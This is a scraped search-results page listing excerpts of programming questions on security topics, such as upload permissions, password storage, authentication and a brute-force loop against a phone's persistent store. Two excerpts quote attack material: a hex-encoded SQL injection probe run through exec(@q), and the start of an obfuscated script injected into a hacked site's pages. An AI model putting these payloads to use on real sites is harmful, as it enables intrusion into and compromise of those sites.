Search Results

Search found 13222 results on 529 pages for 'security gate'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 173/529 | < Previous Page | 169 170 171 172 173 174 175 176 177 178 179 180  | Next Page >

  • USB token with certificate

    - by Frengo
    Hi all! Someone could explain me how the USB token works? I have to implement that secure layer in a java application, but i don't know very well how it works! I know only the mecanism of a normal token key generator! Thanks a lot!

    Read the article

  • C# Threading and Sql Connections

    - by Jonathan M
    I have a method that attempts to update a sql server database in an ASP.NET application. If the update fails, it catches the exception and then queues the update in MSMQ, and then spins up a new thread that will later de-queue the pending update and try again. When the thread starts, it fails to open a database connection because it is attempting to connect using Network Service as the login. The sql connection is using Windows Authentication, and will work outside of the thread. If I put a breakpoint in the code that executes inside the new thread and check the Thread.CurrentPrincipal, it shows the Identity as being the correct user. Why is the sql connection attempting to be opened by the Network Service account? I can elaborate further is necessary. Thanks.

    Read the article

  • How do I secure a folder used to let users upload files?

    - by Eduardo Molteni
    I have a folder in my web server used for the users to upload photos using an ASP page. Is it safe enough to give IUSR write permissions to the folder? Must I secure something else? I am afraid of hackers bypassing the ASP page and uploading content directly to the folder. I'm using ASP classic and IIS6 on Windows 2003 Server. The upload is through HTTP, not FTP. Edit: Changing the question for clarity and changing my answers as comments.

    Read the article

  • Best way to get a reasonably random key for MYSQL records

    - by Steve N
    Hi there, I need to generate a reasonably random unique key for a table. It should be something like a GUID for MYSQL. I've tried UUID, but it looks like only the first few characters are actually random- the rest are the same every time I insert them. Essentially, it is desirable for this key field to be very difficult to guess, even if you already have one known value in the column. What is the best way to do this, and how should I set up the field data type to store the value efficiently? Thank you, Steve

    Read the article

  • Bruteforcing Blackberry PersistentStore?

    - by Haoest
    Hello, I am experimenting with Blackberry's Persistent Store, but I have gotten nowhere so far, which is good, I guess. So I have written a a short program that attempts iterator through 0 to a specific upper bound to search for persisted objects. Blackberry seems to intentionally slow the loop. Check this out: String result = "result: \n"; int ub = 3000; Date start = Calendar.getInstance().getTime(); for(int i=0; i<ub; i++){ PersistentObject o = PersistentStore.getPersistentObject(i); if (o.getContents() != null){ result += (String) o.getContents() + "\n"; } } result += "end result\n"; result += "from 0 to " + ub + " took " + (Calendar.getInstance().getTime().getTime() - start.getTime()) / 1000 + " seconds"; From 0 to 3000 took 20 seconds. Is this enough to conclude that brute-forcing is not a practical method to breach the Blackberry? In general, how secure is BB Persistent Store?

    Read the article

  • What is this hacker trying to do?

    - by JW
    If you do a search for: http://www.google.co.uk/search?q=0x57414954464F522044454C4159202730303A30303A313527&hl=en&start=30&sa=N you will see a lot of examples of an attempted hack along the lines of: 1) declare @q varchar(8000) select @q = 0x57414954464F522044454C4159202730303A30303A313527 exec(@q) -- What is exactly is it trying to do? Which db is it trying to work on? Do you know of any advisories about this?

    Read the article

  • Automatic User Authentication Framework for Controllers in ASP.NET MVC?

    - by Austin
    In rails I could do something like this to make sure a user is authenticated before accessing an action in the controller: before_filter :checked_logged_in, :only => [:edit, :update] I was wondering if ASP.NET MVC had something similar or if there was a framework out there that could essentially do something like the following: For certain methods with actions that take a certain parameter, I want to point the action to a method, check to see if the user owns that object, and if so, proceed to the controller action. If not, I want to redirect him to another action where I can show him he has invalid credentials. So basically I am looking for a sort of "before_filter." Anyone know of anything out there that can do this? Thanks!

    Read the article

  • How to design authentication in a thick client, to be fail safe?

    - by Jay
    Here's a use case: I have a desktop application (built using Eclipse RCP) which on start, pops open a dialog box with 'UserName' and 'Password' fields in it. Once the end user, inputs his UserName and Password, a server is contacted (a spring remote-servlet, with the client side being a spring httpclient: similar to the approaches here.), and authentication is performed on the server side. A few questions related to the above mentioned scenario: If said this authentication service were to go down, what would be the best way to handle further proceedings? Authentication is something that I cannot do away with. Would running the desktop client in a "limited" mode be a good idea? For instance, important features/menus/views will be disabled, rest of the application will be accessible? Should I have a back up authentication service running on a different machine, working as a backup? What are the general best-practices in this scenario? I remember reading about google gears and how it would let you edit and do stuff offline - should something like this be designed? Please let me know your design/architectural comments/suggestions. Appreciate your help.

    Read the article

  • Does HttpWebRequest automatically take care of certificate validation?

    - by Kevin Pang
    I'm using an HttpWebRequest object to access a web service via an HTTP POST. Part of the requirement is that I: Verify that the URL in the certificate matches the URL I'm posting to Verify that the certificate is valid and trusted Verify that the certificate has not expired Does HttpWebRequest automatically handle that for me? I'd assume that if any of these conditions came up, I'd get the standard "could not establish trust relationship for the SSL/TLS secure channel" exception.

    Read the article

  • SQL Server db_owner

    - by andrew007
    Hi, in my SQL2008 I have a user which is in the "db_datareader", "db_datawriter" and "db_ddladmin" DB roles, however when he tries to modify a table with SSMS he receives a message saying: You are not logged in as the database owner or system administrator. You might not be able to save changes to tables that you do not own. Of course, I would like to avoid such message, but until now I did find the way... Therefore, I try to modify the user by adding him to the "db_owner" role, and of course I do not have the message above. My question is: Is it possible to keep the user in the "db_owner" role, but deny some actions like alter user or ? I try "alter any user" securable on DB level, but it does not work... THANKS!

    Read the article

  • Secure password transmission over unencrypted tcp/ip

    - by academicRobot
    I'm in the designing stages of a custom tcp/ip protocol for mobile client-server communication. When not required (data is not sensitive), I'd like to avoid using SSL for overhead reasons (both in handshake latency and conserving cycles). My question is, what is the best practices way of transmitting authentication information over an unencrypted connection? Currently, I'm liking SRP or J-PAKE (they generate secure session tokens, are hash/salt friendly, and allow kicking into TLS when necessary), which I believe are both implemented in OpenSSL. However, I am a bit wary since I don't see many people using these algorithms for this purpose. Would also appreciate pointers to any materials discussing this topic in general, since I had trouble finding any.

    Read the article

  • Deny http access to a directory, allow access from WordPress plugin

    - by luke
    Hey. I need to prevent direct access to http://www.site.com/wp-content/uploads/folder/something.pdf through the browser. However the Download Monitor plugin I am using, which allows logged in users to download the file, needs to be able to work. Trying Order Allow,Deny Deny from all Allow from all but the download links do not now work... even though (I think) they are links produced by the script e.g. http://www.site.com/wp-content/plugins/download-monitor/download.php?id=something.pdf Enter that in the address bar and you correctly get a WordPress message, 'You must be logged in to download this file.' However, if someone knows the URL where the file was uploaded http://www.site.com/wp-content/uploads/folder/something.pdf they can still access it directly. I don't know how (guesswork?) they would find the direct URL anyway, but the client wants it stopped! Thanks for any help.

    Read the article

  • WINSDK: Determining whether an arbitrary pid identifies a running process on Windows

    - by Vlad Romascanu
    Attempting to implement a poor man's test of whether a process is still running or not (essentially an equivalent of the trivial kill(pid, 0).) Hoped to be able to simply call OpenProcess with some minimal desired access then test for either GetLastError() == ERROR_INVALID_PARAMETER or GetExitCodeProcess(...) != STILL_ACTIVE. Nice try... Running on Windows XP, as administrator: HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); if (!hProc) { DWORD dwLastError = GetLastError(); } ...fails miserably with dwLastError == ERROR_ACCESS_DENIED when pid is owned by a different (not SYSTEM) user. Moreover, if pid was originally owned by a different user but has since terminated, OpenProcess also fails with ERROR_ACCESS_DENIED (not ERROR_INVALID_PARAMETER.) Do I have to use Process32First/Process32Next or EnumProcesses? I absolutely do not want to use SeDebugPrivilege. Thanks, V

    Read the article

  • PHP 2-way encryption: I need to store passwords that can be retrieved

    - by gAMBOOKa
    I am creating an application that will store passwords, which the user can retrieve and see. The passwords are for a hardware device, so checking against hashes are out of the question. What I need to know is: How do I encrypt and decrypt a password in PHP? What is the safest algorithm to encrypt the passwords with? Where do I store the private key? Instead of storing the private key, is it a good idea to require users to enter the private key any time they need a password decrypted? (Users of this application can be trusted) In what ways can the password be stolen and decrypted? What do I need to be aware of?

    Read the article

  • Chunks of javascript added to webpages on server

    - by SteD
    I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b" Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself? I am using Drupal + Ubercart with quite minimal forms inputs.

    Read the article

  • block write access to table from an application in mysql

    - by hoberion
    Hello, We have a CMS plugin that writes statistics to 1 table, this creates performance issues on the entire platform. We decided to use another statistics plugin which can connect to a different database server (the first plugin couldn't!) however we need parts of the first plugin. I want to lock the statistics table to prevent misusage (not allowed to drop it by the developer) So I was wondering if a lock table could do this or if I can implement some sort of read only table

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 169 170 171 172 173 174 175 176 177 178 179 180  | Next Page >